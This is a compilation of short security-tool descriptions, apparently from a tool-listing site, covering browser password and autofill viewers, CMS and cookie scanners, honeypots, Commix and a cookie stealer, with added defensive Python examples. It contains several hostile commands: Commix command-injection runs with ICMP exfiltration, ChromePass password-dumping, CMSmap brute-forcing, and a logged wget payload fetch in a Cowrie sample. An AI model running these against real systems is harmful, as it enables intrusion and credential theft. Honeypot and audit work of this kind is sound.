brew install cheat

Manually
First install the required python dependencies with:
sudo pip install docopt pygments
Then, clone this repository, cd into it, and run:
sudo python setup.py install

Modifying Cheatsheets

The value of cheat is that it allows you to create your own cheatsheets - the defaults are meant to serve only as a starting point, and can and should be modified.

Cheatsheets are stored in the ~/.cheat/ directory, and are named on a per-keyphrase basis. In other words, the content for the tar cheatsheet lives in the ~/.cheat/tar file.

Provided that you have an EDITOR environment variable set, you may edit cheatsheets with:
cheat -e foo

If the 'foo' cheatsheet already exists, it will be opened for editing. Otherwise, it will be created automatically.

After you've customized your cheatsheets, I urge you to track ~/.cheat/ along with your dotfiles.


Download Cheat

Chrome Autofill Viewer - Tool to View or Delete Autocomplete data from Google Chrome browser


Chrome Autofill Viewer is the free tool to easily see and delete all your autocomplete data from Google Chrome browser.

Chrome stores Autofill entries (typically form-field values) such as login names, PINs, passwords, e-mail addresses, postal addresses, phone numbers, credit/debit card numbers and search history in an internal database file.

'Chrome Autofill Viewer' automatically finds and displays all the Autofill history data from the Chrome browser. For each entry it shows the following details:
  • Field Name
  • Value
  • Total Used Count
  • First Used Date
  • Last Used Date
You can also use it to view an Autofill file belonging to another user on the same or a remote system. It also provides a one-click option to delete all the displayed Autofill data from that file.

It is very simple to use, which makes it a handy tool for forensic investigators.

Chrome Autofill Viewer is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.
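The following is an added example and not Chrome Autofill Viewer's code. It reads autofill entries from a Chrome profile database with the Python standard library and produces the same five columns the tool lists, working from a copy opened read-only so the evidence file is never written to. The table layout is written to match Chrome's 'Web Data' autofill table (name, value, date_created, date_last_used, count, with the dates as Unix seconds); treat that layout as an assumption and confirm it against the Chrome build under examination. The sample database and its rows are constructed.

```python
"""Added example (not the tool's code): list Chrome autofill entries from a
'Web Data' SQLite file, most-used first, and export them as CSV."""
import csv
import datetime
import io
import os
import pathlib
import shutil
import sqlite3
import tempfile

COLUMNS = ["Field Name", "Value", "Total Used Count", "First Used Date", "Last Used Date"]

# Assumed layout of Chrome's Web Data 'autofill' table.
AUTOFILL_SCHEMA = """
CREATE TABLE autofill (
    name VARCHAR, value VARCHAR, value_lower VARCHAR,
    date_created INTEGER DEFAULT 0, date_last_used INTEGER DEFAULT 0,
    count INTEGER DEFAULT 1,
    PRIMARY KEY (name, value));
"""

SAMPLE_ROWS = [  # constructed: (name, value, date_created, date_last_used, count)
    ("email", "alice@example.org", 1448928000, 1449360000, 12),
    ("zip", "90210", 1449100000, 1449100000, 1),
    ("card_number", "4111111111111111", 1449200000, 1449300000, 3),
]


def make_sample_db(path):
    """Write a constructed stand-in for a profile's 'Web Data' file."""
    con = sqlite3.connect(path)
    with con:
        con.executescript(AUTOFILL_SCHEMA)
        con.executemany("INSERT INTO autofill VALUES (?, ?, ?, ?, ?, ?)",
                        [(n, v, v.lower(), c, u, k) for n, v, c, u, k in SAMPLE_ROWS])
    con.close()


def _fmt(unix_seconds):
    stamp = datetime.datetime.fromtimestamp(unix_seconds, datetime.timezone.utc)
    return stamp.strftime("%Y-%m-%d %H:%M:%S UTC")


def read_autofill(web_data_path):
    """Copy the database first (Chrome locks the live file, and evidence must
    not be modified), open the copy read-only, return the tool's columns."""
    workdir = tempfile.mkdtemp()
    try:
        copy = os.path.join(workdir, "Web Data")
        shutil.copy2(web_data_path, copy)
        con = sqlite3.connect(pathlib.Path(copy).as_uri() + "?mode=ro", uri=True)
        try:
            rows = con.execute(
                "SELECT name, value, count, date_created, date_last_used "
                "FROM autofill ORDER BY count DESC, name").fetchall()
        finally:
            con.close()
    finally:
        shutil.rmtree(workdir)
    return [dict(zip(COLUMNS, (n, v, k, _fmt(c), _fmt(u)))) for n, v, k, c, u in rows]


def to_csv(entries):
    """The tool's CSV export, as a string."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=COLUMNS, lineterminator="\n")
    writer.writeheader()
    writer.writerows(entries)
    return buf.getvalue()


def demo():
    """Build the constructed database in a temporary directory and read it back."""
    workdir = tempfile.mkdtemp()
    try:
        path = os.path.join(workdir, "Web Data")
        make_sample_db(path)
        return read_autofill(path)
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    print(to_csv(demo()))
```

Point read_autofill at a real profile's Web Data file to get the same listing the tool shows; the date columns are rendered in UTC so that entries from different machines compare directly.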

Features
  • Instantly view all the Autofill list from Chrome browser
  • On startup, it auto detects Autofill file from Chrome's default profile location
  • Sort feature to arrange the data in various order to make it easier to search through 100's of entries.
  • Delete all the Autofill data with just a click of button
  • Save the displayed Autofill list to HTML/XML/TEXT/CSV file
  • Easier and faster to use with its enhanced user friendly GUI interface
  • Fully Portable, does not require any third party components like JAVA, .NET etc
  • Support for local Installation and uninstallation of the software

How to Use?

Chrome Autofill Viewer is easy to use with its simple GUI interface.

Here are the brief usage details
  • Launch ChromeAutofillViewer on your system
  • By default it will automatically find and display the autofill file from default profile location of Chrome. You can also select the desired file manually.
  • Next click on the 'Show All' button and all stored Autofill data will be displayed in the list.
  • If you want to remove all the entries, click on 'Delete All' button below.
  • Finally you can save all displayed entries to HTML/XML/TEXT/CSV file by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.

ChromePass - Chrome Browser Password Recovery Tool


ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time.

You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.

Using ChromePass

ChromePass doesn't require any installation process or additional DLL files. To start using ChromePass, simply run the executable file, ChromePass.exe. The main window then lists all passwords currently stored by your Google Chrome browser.

Reading ChromePass passwords from external drive

Starting from version 1.05, you can also read the passwords stored by the Chrome Web browser from an external profile in your current operating system or from another external drive (for example, from a dead system that cannot boot anymore). To use this feature you must know the last log-on password used for this profile: Chrome on Windows protects the stored passwords with DPAPI, whose master key is derived from a hash of the log-on password, so without that password the entries cannot be decrypted.

You can use this feature from the UI, by selecting the 'Advanced Options' in the File menu, or from command-line, by using /external parameter. The user profile path should be something like "C:\Documents and Settings\admin" in Windows XP/2003 or "C:\users\myuser" in Windows Vista/2008.

Command-Line Options
/stext <Filename> Save the list of passwords into a regular text file.
/stab <Filename> Save the list of passwords into a tab-delimited text file.
/scomma <Filename> Save the list of passwords into a comma-delimited text file.
/stabular <Filename> Save the list of passwords into a tabular text file.
/shtml <Filename> Save the list of passwords into HTML file (Horizontal).
/sverhtml <Filename> Save the list of passwords into HTML file (Vertical).
/sxml <Filename> Save the list of passwords to XML file.
/skeepass <Filename> Save the list of passwords to KeePass csv file.
/external <User Profile Path> <Last Log-On Password> Load the Chrome passwords from external drive/profile. For example:
chromepass.exe /external "C:\Documents and Settings\admin" "MyPassword"


Download ChromePass

CMSmap - Scanner to detect security flaws of the most popular CMSs (WordPress, Joomla and Drupal)



CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal.

Please note that this project is in an early state. As such, you might find bugs, flaws or malfunctions. Use it at your own risk!

Installation
You can download the latest version of CMSmap by cloning the GitHub repository:
git clone https://github.com/Dionach/CMSmap.git

Usage
CMSmap tool v0.3 - Simple CMS Scanner
Author: Mike Manzotti mike.manzotti@dionach.com
Usage: cmsmap.py -t <URL>
          -t, --target    target URL (e.g. 'https://abc.test.com:8080/')
          -v, --verbose   verbose mode (Default: false)
          -T, --threads   number of threads (Default: 5)
          -u, --usr       username or file 
          -p, --psw       password or file
          -i, --input     scan multiple targets listed in a given text file
          -o, --output    save output in a file
          -k, --crack     password hashes file
          -w, --wordlist  wordlist file (Default: rockyou.txt - WordPress only)       
          -a, --agent     set custom user-agent  
          -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules
          -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
          -F, --fullscan  full scan using large plugin lists. Slow! (Default: false)
          -h, --help      show this help   

Example: cmsmap.py -t https://example.com
         cmsmap.py -t https://example.com -f W -F
         cmsmap.py -t https://example.com -i targets.txt -o output.txt
         cmsmap.py -t https://example.com -u admin -p passwords.txt
         cmsmap.py -k hashes.txt


Download CMSmap

Codetainer - A Docker Container In Your Browser


codetainer allows you to create code 'sandboxes' you can embed in your web applications (think of it as an OSS clone of codepicnic.com).

Codetainer runs as a webservice and provides APIs to create, view, and attach to the sandbox along with a nifty HTML terminal you can interact with the sandbox in realtime. It uses Docker and its introspection APIs to provide the majority of this functionality.

Codetainer is written in Go. For more information, see the slides from the introductory talk.

Build & Installation

Requirements
  • Docker >=1.8 (required for file upload API)
  • Go >=1.4
  • godep

Building & Installing From Source
# set your $GOPATH
go get github.com/codetainerapp/codetainer  
# you may get errors about not compiling due to Asset missing, it's ok. bindata.go needs to be created
# by `go generate` first.
cd $GOPATH/src/github.com/codetainerapp/codetainer
# make install_deps  # if you need the dependencies like godep
make
This will create ./bin/codetainer.

Configuring Docker
You must configure Docker to listen on a TCP port. Keep that listener on the loopback address, as in the line below, or put TLS with client certificates in front of it (see the DockerServerUseHttps and DockerCertPath options further down): anyone who can reach the Docker API can start privileged containers, which is equivalent to root on the Docker host.
DOCKER_OPTS="-H tcp://127.0.0.1:4500 -H unix:///var/run/docker.sock"

Configuring codetainer
See ~/.codetainer/config.toml. This file will get auto-generated the first time you run codetainer, please edit defaults as appropriate.
# Docker API server and port
DockerServer = "localhost"
DockerPort = 4500

# Enable TLS support (optional, if you access to Docker API over HTTPS)
# DockerServerUseHttps = true
# Certificate directory path (optional)
#   e.g. if you use Docker Machine: "~/.docker/machine/certs"
# DockerCertPath = "/path/to/certs"

# Database path (optional, default is ~/.codetainer/codetainer.db)
# DatabasePath = "/path/to/codetainer.db"

Running an example codetainer
$ sudo docker pull ubuntu:14.04
$ codetainer image register ubuntu:14.04
$ codetainer create ubuntu:14.04 my-codetainer-name
$ codetainer server  # to start the API server on port 3000

Embedding a codetainer in your web app
  1. Copy codetainer.js to your webapp.
  2. Include codetainer.js and jquery in your web page. Create a div to house the codetainer terminal iframe (it's #terminal in the example below).
    <!DOCTYPE html>
    <html>
    <head>
      <meta charset="UTF-8">
      <title>lsof tutorial</title>
      <link rel='stylesheet' href='/stylesheets/style.css' />
      <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
      <script src="/javascripts/codetainer.js"></script>
      <script src="/javascripts/lsof.js"></script>
    </head>
    <body>
       <div id="terminal" data-container="YOUR CODETAINER ID HERE"></div>
    </body>
    </html> 
  3. Run the javascript to load the codetainer iframe from the codetainer API server (supply data-container as the id of codetainer on the div, or supply codetainer in the constructor options).
 $('#terminal').codetainer({
     terminalOnly: false,                 // set to true to show only a terminal window 
     url: "http://127.0.0.1:3000",        // replace with codetainer server URL
     container: "YOUR CONTAINER ID HERE",
     width: "100%",
     height: "100%",
  });


Download Codetainer

Collection Of Awesome Honeypots


A curated list of awesome honeypots, tools, components and much more. The list is divided into categories such as web, services, and others, focusing on open source projects.

Honeypots

  • Database Honeypots
  • Web honeypots
  • Service Honeypots
    • Kippo - Medium interaction SSH honeypot
    • honeyntp - NTP logger/honeypot
    • honeypot-camera - observation camera honeypot
    • troje - a honeypot built around lxc containers. It will run each connection with the service within a separate lxc container.
    • slipm-honeypot - A simple low-interaction port monitoring honeypot
    • HoneyPy - A low interaction honeypot
    • Ensnare - Easy to deploy Ruby honeypot
    • RDPy - A Microsoft Remote Desktop Protocol (RDP) honeypot in python
  • Anti-honeypot stuff
    • kippo_detect - This is not a honeypot, but it detects kippo. (The same author has more interesting tools.)
  • ICS/SCADA honeypots
    • Conpot - ICS/SCADA honeypot
    • scada-honeynet - mimics many of the services from a popular PLC and better helps SCADA researchers understand potential risks of exposed control system devices
    • SCADA honeynet - Building Honeypots for Industrial Networks
  • Deployment
  • Data Analysis
    • Kippo-Graph - a full featured script to visualize statistics from a Kippo SSH honeypot
    • Kippo stats - Mojolicious app to display statistics for your kippo SSH honeypot
  • Other/random
    • NOVA uses honeypots as detectors, looks like a complete system.
    • Open Canary - A low interaction honeypot intended to be run on internal networks.
    • libemu - Shellcode emulation library, useful for shellcode detection.
  • Open Relay Spam Honeypot
  • Botnet C2 monitor
    • Hale - Botnet command & control monitor
  • IPv6 attack detection tool
    • ipv6-attack-detector - Google Summer of Code 2012 project, supported by The Honeynet Project organization
  • Research Paper
    • vEYE - behavioral footprinting for self-propagating worm detection and profiling
  • Honeynet statistics
    • HoneyStats - A statistical view of the recorded activity on a Honeynet
  • Dynamic code instrumentation toolkit
    • Frida - Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android
  • Front-end for dionaea
    • DionaeaFR - Front Web to Dionaea low-interaction honeypot
  • Tool to convert website to server honeypots
    • HIHAT - Transform arbitrary PHP applications into web-based high-interaction Honeypots
  • Malware collector
    • Kippo-Malware - Python script that will download all malicious files stored as URLs in a Kippo SSH honeypot database
  • Sebek in QEMU
    • Qebek - QEMU based Sebek. As Sebek, it is data capture tool for high interaction honeypot
  • Malware Simulator
    • imalse - Integrated MALware Simulator and Emulator
  • Distributed sensor deployment
    • Smarthoneypot - custom honeypot intelligence system that is simple to deploy and easy to manage
    • Modern Honey Network - Multi-snort and honeypot sensor management, uses a network of VMs, small footprint SNORT installations, stealthy dionaeas, and a centralized server for management
    • ADHD - Active Defense Harbinger Distribution (ADHD) is a Linux distro based on Ubuntu LTS. It comes with many tools aimed at active defense preinstalled and configured
  • Network Analysis Tool
  • Log anonymizer
    • LogAnon - log anonymization library that helps having anonymous logs consistent between logs and network captures
  • server
    • Honeysink - open source network sinkhole that provides a mechanism for detection and prevention of malicious traffic on a given network
  • Botnet traffic detection
    • dnsMole - analyse DNS traffic to potentially detect botnet C&C servers and infected hosts
  • Low interaction honeypot (router back door)
  • honeynet farm traffic redirector
    • Honeymole - Deploy multiple sensors that redirect traffic to a centralized collection of honeypots
  • HTTPS Proxy
    • mitmproxy - allows traffic flows to be intercepted, inspected, modified and replayed
  • spamtrap
  • System instrumentation
    • Sysdig - open source, system-level exploration: capture system state and activity from a running Linux instance, then save, filter and analyze
  • Honeypot for USB-spreading malware
    • Ghost-usb - honeypot for malware that propagates via USB storage devices
  • Data Collection
    • Kippo2MySQL - extracts some very basic stats from Kippo’s text-based log files (a mess to analyze!) and inserts them in a MySQL database
    • Kippo2ElasticSearch - Python script to transfer data from a Kippo SSH honeypot MySQL database to an ElasticSearch instance (server or cluster)
  • Passive network audit framework parser
    • pnaf - Passive Network Audit Framework
  • VM Introspection
    • VIX virtual machine introspection toolkit - VMI toolkit for Xen, called Virtual Introspection for Xen (VIX)
    • vmscope - Monitoring of VM-based High-Interaction Honeypots
    • vmitools - C library with Python bindings that makes it easy to monitor the low-level details of a running virtual machine
  • Binary debugger
  • Mobile Analysis Tool
    • APKinspector - APKinspector is a powerful GUI tool for analysts to analyze the Android applications
    • Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more
  • Low interaction honeypot
    • Honeypoint - platform of distributed honeypot technologies
    • Honeyperl - Honeypot software based in Perl with plugins developed for many functions like : wingates, telnet, squid, smtp, etc
  • Honeynet data fusion
    • HFlow2 - data coalescing tool for honeynet/network analysis
  • Server
    • LaBrea - takes over unused IP addresses, and creates virtual servers that are attractive to worms, hackers, and other denizens of the Internet.
    • Kippo - SSH honeypot
    • KFSensor - Windows based honeypot Intrusion Detection System (IDS)
    • Honeyd Also see more honeyd tools
    • Glastopf - Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications
    • DNS Honeypot - Simple UDP honeypot scripts
    • Conpot - Low interaction server side Industrial Control Systems honeypot
    • Bifrozt - High interaction honeypot solution for Linux based systems
    • Beeswarm - Honeypot deployment made easy
    • Bait and Switch - redirects all hostile traffic to a honeypot that is partially mirroring your production system
    • Artillery - open-source blue team tool designed to protect Linux and Windows operating systems through multiple methods
    • Amun - vulnerability emulation honeypot
  • VM cloaking script
    • Antivmdetect - Script to create templates to use with VirtualBox to make vm detection harder
  • IDS signature generation
  • lookup service for AS-numbers and prefixes
  • Web interface (for Thug)
    • Rumal - Thug's Rumāl: a Thug's dress & weapon
  • Data Collection / Data Sharing
    • HPfriends - data-sharing platform
    • HPFeeds - lightweight authenticated publish-subscribe protocol
  • Distributed spam tracking
  • Python bindings for libemu
  • Controlled-relay spam honeypot
  • Visualization Tool
  • central management tool
  • Network connection analyzer
  • Virtual Machine Cloaking
  • Honeypot deployment
  • Automated malware analysis system
  • Low interaction
  • Low interaction honeypot on USB stick
  • Honeypot extensions to Wireshark
  • Data Analysis Tool
  • Telephony honeypot
  • Client
  • Visual analysis for network traffic
  • Binary Management and Analysis Framework
  • Honeypot
  • PDF document inspector
  • Distribution system
  • HoneyClient Management
  • Network Analysis
  • Hybrid low/high interaction honeypot
  • Sebek on Xen
  • SSH Honeypot
  • Glastopf data analysis
  • Distributed sensor project
  • a pcap analyzer
  • Client Web crawler
  • network traffic redirector
  • Honeypot Distribution with mixed content
  • Honeypot sensor
  • File carving
  • File and Network Threat Intelligence
  • data capture
  • SSH proxy
  • Anti-Cheat
  • behavioral analysis tool for win32
  • Live CD
  • Spamtrap
  • Commercial honeynet
  • Server (Bluetooth)
  • Dynamic analysis of Android apps
  • Dockerized Low Interaction packaging
  • Network analysis
  • Sebek data visualization
  • SIP Server
  • Botnet C2 monitoring
  • low interaction
  • Malware collection

Honeyd Tools

Network and Artifact Analysis

  • Sandbox
  • Sandbox-as-a-Service
    • malwr.com - free malware analysis service and community
    • detux.org - Multiplatform Linux Sandbox
    • Joebox Cloud - analyzes the behavior of malicious files including PEs, PDFs, DOCs, PPTs, XLSs, APKs, URLs and MachOs on Windows, Android and Mac OS X for suspicious activities

Data Tools

  • Front Ends
    • Tango - Honeypot Intelligence with Splunk
    • Django-kippo - Django App for kippo SSH Honeypot
    • Wordpot-Frontend - a full featured script to visualize statistics from a Wordpot honeypot
    • Shockpot-Frontend - a full featured script to visualize statistics from a Shockpot honeypot
  • Visualization
    • HoneyMap - Real-time websocket stream of GPS events on a fancy SVG world map
    • HoneyMalt - Maltego transforms for mapping Honeypot systems

Source

Commix - Automated All-in-One OS Command Injection and Exploitation Tool


Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers or even security researchers to test web applications with the aim of finding bugs, errors or vulnerabilities related to command injection attacks. With this tool it is very easy to find and exploit a command injection vulnerability in a given vulnerable parameter or string. Commix is written in the Python programming language.

Requirements
Python version 2.6.x or 2.7.x is required for running this program.

Installation
Download commix by cloning the Git repository:
git clone https://github.com/stasinopoulos/commix.git commix

Usage
Usage: python commix.py [options]

Options
-h, --help Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

Target
This option has to be provided to define the target URL.

--url=URL           Target URL.
--url-reload        Reload target URL after command execution.

Request
These options can be used to specify how to connect to the target
URL.

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

Injection
These options can be used to specify which parameters to inject and
to provide custom injection payloads.

--data=DATA         POST data to inject (use 'INJECT_HERE' tag).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
                    'ip_src=192.168.178.1,ip_dst=192.168.178.3').

Usage Examples

Exploiting Damn Vulnerable Web App
python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'" 
Exploiting OWASP Mutillidae using Extra headers and HTTP proxy:
python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
Exploiting Persistence using the ICMP exfiltration technique:
su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""


Download Commix

Cookies Manager - Simple Cookie Stealer


A simple program in PHP to help with XSS vulnerabilities. The features of this program are the following:

[+] Cookie Stealer with TinyURL Generator
[+] Lets you see the cookies that a page returns
[+] Can create cookies with the information you want
[+] The panel login is hidden; use ?poraca to find the login page

A video with examples of use:


Download Cookies Manager

Cookiescanner - Tool to Check the Cookie Flag for a Multiple Sites


Tool to make the web scanning process easier: it checks whether the Secure and HttpOnly flags are enabled on the cookies a site sets (and reports path and expires too).

This tool can probe multiple URLs from an input file, all subdomains of a domain found through a Google search, or a single URL. It also supports multiple output formats such as JSON, XML and CSV.

Features:

  •  Multiple options for output (and export using >): xml, json, csv, grepable
  •  Check the flags on multiple sites from a file input (one per line). This is very useful for pentesters who want to check the flags on multiple sites.
  •  Google search. Search Google for all subdomains and check the cookies of each domain.
  • Colors for the normal output.
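The check Cookiescanner performs, shown as an added example rather than the tool's own code: the standard-library cookie parser is run over raw Set-Cookie header values and each cookie is reported with its Secure and HttpOnly flags, Path and Expires. The three header strings are constructed for the example, not captured from any site; the function names are this example's own.

```python
"""Audit Set-Cookie header values for the Secure and HttpOnly flags.

Added example (not Cookiescanner's code). It works offline on constructed
header strings and uses http.cookies.SimpleCookie, the standard-library
parser, so nothing is fetched from the network.
"""
from http.cookies import SimpleCookie

# Constructed sample headers; none were captured from a real site.
SAMPLE_HEADERS = [
    "PHPSESSID=abc123; Path=/; HttpOnly",
    "auth=tok; Path=/; Secure; HttpOnly; Expires=Wed, 21 Oct 2026 07:28:00 GMT",
    "tracker=xyz; Path=/app",
]


def audit_set_cookie(header):
    """Return one dict per cookie found in a Set-Cookie header value."""
    jar = SimpleCookie()
    jar.load(header)  # tolerant parser: unknown attributes are dropped
    results = []
    for name, morsel in jar.items():
        results.append({
            "name": name,
            # a flag attribute is '' when absent and True when present
            "secure": bool(morsel["secure"]),
            "httponly": bool(morsel["httponly"]),
            "path": morsel["path"] or "(unset)",
            "expires": morsel["expires"] or "session",
        })
    return results


def missing_flags(cookie):
    """List the protective flags a parsed cookie lacks, in a fixed order."""
    missing = []
    if not cookie["secure"]:
        missing.append("Secure")
    if not cookie["httponly"]:
        missing.append("HttpOnly")
    return missing


def findings(headers):
    """(cookie name, missing flags) for every cookie across all headers."""
    out = []
    for header in headers:
        for cookie in audit_set_cookie(header):
            out.append((cookie["name"], missing_flags(cookie)))
    return out


def grepable(headers):
    """One line per cookie, in the spirit of the tool's grepable format."""
    lines = []
    for header in headers:
        for c in audit_set_cookie(header):
            flags = " ".join(
                f"{k}={'yes' if c[k] else 'no'}" for k in ("secure", "httponly")
            )
            lines.append(f"{c['name']} {flags} path={c['path']} expires={c['expires']}")
    return lines


if __name__ == "__main__":
    for line in grepable(SAMPLE_HEADERS):
        print(line)
```

A cookie that carries a session identifier and lacks HttpOnly is readable by injected script, which is exactly what a cookie stealer relies on; one that lacks Secure will be sent over plain HTTP if the site is ever reached without TLS. Path and Expires are reported rather than judged, because whether a broad path or a long lifetime is acceptable depends on what the cookie is for.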

Usage

Usage: cookiescanner.py [options] 
Example: ./cookiescanner.py -i ips.txt

Options:
  -h, --help            show this help message and exit
  -i INPUT, --input=INPUT
                        File input with the list of webservers
  -I, --info            More info
  -u URL, --url=URL     URL
  -f FORMAT, --format=FORMAT
                        Output format (json, xml, csv, normal, grepable)
  --nocolor             Disable color (for the normal format output)
  -g GOOGLE, --google=GOOGLE
                        Search in google by domain

Requirements

requests >= 2.8.1
BeautifulSoup >= 4.2.1

Install requirements

pip3 install --upgrade -r requirements.txt


Download Cookiescanner

Cowrie - SSH Honeypot


Cowrie is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.

Cowrie is directly based on Kippo by Upi Tamminen (desaster).

Features

Some interesting features:
  • Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
  • Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included
  • Session logs stored in a UML-compatible format for easy replay with original timings
  • Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection
Additional functionality over standard kippo:
  • SFTP and SCP support for file upload
  • Support for SSH exec commands
  • Logging of direct-tcp connection attempts (ssh proxying)
  • Logging in JSON format for easy processing in log management solutions
  • Many, many additional commands

Requirements

Software required:
  • An operating system (tested on Debian, CentOS, FreeBSD and Windows 7)
  • Python 2.5+
  • Twisted 8.0+
  • PyCrypto
  • pyasn1
  • Zope Interface

Files of interest:
  • dl/ - files downloaded with wget are stored here
  • log/cowrie.log - log/debug output
  • log/cowrie.json - transaction output in JSON format
  • log/tty/ - session logs
  • utils/playlog.py - utility to replay session logs
  • utils/createfs.py - used to create fs.pickle
  • data/fs.pickle - fake filesystem
  • honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here
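Cowrie's JSON logging (log/cowrie.json, one JSON object per line) is what makes the honeypot easy to feed into a log pipeline. The following is an added example, not part of Cowrie: it reads a constructed sample of that file, counts failed logins per source address to flag brute forcing, and pulls out successful logins, commands typed and files downloaded. The event names and field names (eventid, src_ip, session, username, password, input, url) are assumed from Cowrie's JSON output as the writer of this example knows it; the log lines themselves are made up.

```python
"""Summarise a Cowrie log/cowrie.json file for brute-force and post-login activity.

Added example, not Cowrie code. Field and event names are assumed from Cowrie's
JSON output; the sample below is constructed and uses documentation IP ranges.
"""
import json
from collections import Counter, defaultdict

# Constructed sample of newline-delimited JSON, one event per line.
SAMPLE_COWRIE_JSON = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "session": "a1", "timestamp": "2015-08-19T18:57:40Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.7", "session": "a1", "timestamp": "2015-08-19T18:57:41Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "password", "src_ip": "203.0.113.7", "session": "a1", "timestamp": "2015-08-19T18:57:42Z"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "203.0.113.7", "session": "a1", "timestamp": "2015-08-19T18:57:43Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "toor", "src_ip": "203.0.113.7", "session": "a1", "timestamp": "2015-08-19T18:57:44Z"}
{"eventid": "cowrie.command.input", "input": "wget http://198.51.100.9/x.sh", "src_ip": "203.0.113.7", "session": "a1", "timestamp": "2015-08-19T18:57:50Z"}
{"eventid": "cowrie.session.file_download", "url": "http://198.51.100.9/x.sh", "src_ip": "203.0.113.7", "session": "a1", "timestamp": "2015-08-19T18:57:51Z"}
{"eventid": "cowrie.login.failed", "username": "pi", "password": "raspberry", "src_ip": "198.51.100.22", "session": "b2", "timestamp": "2015-08-19T19:01:00Z"}
this line is not JSON and must be skipped
"""


def parse_events(text):
    """Yield one dict per well-formed JSON line; blank or malformed lines are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a truncated or corrupt line must not abort the whole run
        if isinstance(event, dict) and "eventid" in event:
            yield event


def summarize(events, threshold=3):
    """Aggregate failures per source IP, plus successes, commands and downloads."""
    failed = Counter()
    successes = []
    commands = defaultdict(list)  # session id -> list of commands typed
    downloads = []
    for ev in events:
        ip = ev.get("src_ip", "?")
        kind = ev["eventid"]
        if kind == "cowrie.login.failed":
            failed[ip] += 1
        elif kind == "cowrie.login.success":
            successes.append((ip, ev.get("username"), ev.get("password")))
        elif kind == "cowrie.command.input":
            commands[ev.get("session")].append(ev.get("input"))
        elif kind == "cowrie.session.file_download":
            downloads.append(ev.get("url"))
    # any source with at least `threshold` failed logins is treated as brute forcing
    bruteforce_ips = sorted(ip for ip, n in failed.items() if n >= threshold)
    return {
        "failed_by_ip": dict(failed),
        "bruteforce_ips": bruteforce_ips,
        "successes": successes,
        "commands": dict(commands),
        "downloads": downloads,
    }


def report(text, threshold=3):
    """Parse and summarise in one call, for a whole log file read into a string."""
    return summarize(parse_events(text), threshold)


if __name__ == "__main__":
    s = report(SAMPLE_COWRIE_JSON)
    print("brute-force sources:", s["bruteforce_ips"])
    print("successful logins:", s["successes"])
    print("downloaded URLs:", s["downloads"])
```

The download URLs and the dl/ directory contents are the artefacts worth feeding into malware analysis, and the per-source failure counts are a ready-made block list input; the threshold is deliberately a parameter because what counts as brute forcing on a honeypot that nobody should be logging into at all is a policy choice.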


Download Cowrie

CrackMapExec - A swiss army knife for pentesting Windows/Active Directory environments


CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!

From enumerating logged on users and spidering SMB shares to executing psexec style attacks and auto-injecting Mimikatz into memory using Powershell!

The biggest improvements over the tools that inspired it are:
